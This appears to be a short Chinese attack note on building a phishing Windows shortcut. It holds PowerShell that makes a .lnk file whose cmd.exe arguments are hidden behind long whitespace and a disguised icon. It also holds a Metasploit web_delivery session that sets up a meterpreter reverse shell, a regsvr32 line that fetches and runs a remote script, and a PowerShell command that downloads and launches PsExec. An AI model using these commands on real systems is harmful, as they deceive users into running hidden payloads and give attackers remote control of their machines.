构造windows快捷方式钓鱼信

cmd /c calc

$file = Get-Content "test.txt"
$WshShell = New-Object -comObject WScript.Shell
$Shortcut = $WshShell.CreateShortcut("test.lnk")
$Shortcut.TargetPath = "%SystemRoot%\system32\cmd.exe"
$Shortcut.IconLocation = "%SystemRoot%\System32\Shell32.dll,21"
$Shortcut.Arguments = '                                                                                                                                                                                                                                    '+ $file
$Shortcut.Save()

msf > use exploit/multi/script/web_delivery 
msf > set target  3
msf > set payload windows/meterpreter/reverse_tcp_rc4_dns 
msf > set lhost 192.168.3.29
msf > set lport 82
msf > set rc4password  klionsec
msf exploit(multi/script/web_delivery) > exploit -j
[*] Exploit running as background job 0.

[*] Started reverse TCP handler on 192.168.3.29:82 
msf exploit(multi/script/web_delivery) > [*] Using URL: http://0.0.0.0:8080/qQJvcDScrbA
[*] Local IP: http://192.168.3.29:8080/qQJvcDScrbA
[*] Server started.
[*] Run the following command on the target machine:
regsvr32 /s /n /u /i:http://192.168.3.29:8080/qQJvcDScrbA.sct scrobj.dll	将此命令单独写到meter.txt文件中去生成快捷方式

powershell.exe (New-Object System.Net.WebClient).DownloadFile('http://192.168.72.23//PsExec.exe','c:\\temp\\PsExec.exe');(New-Object -com Shell.Application).ShellExecute('c:\\temp\\PsExec.exe')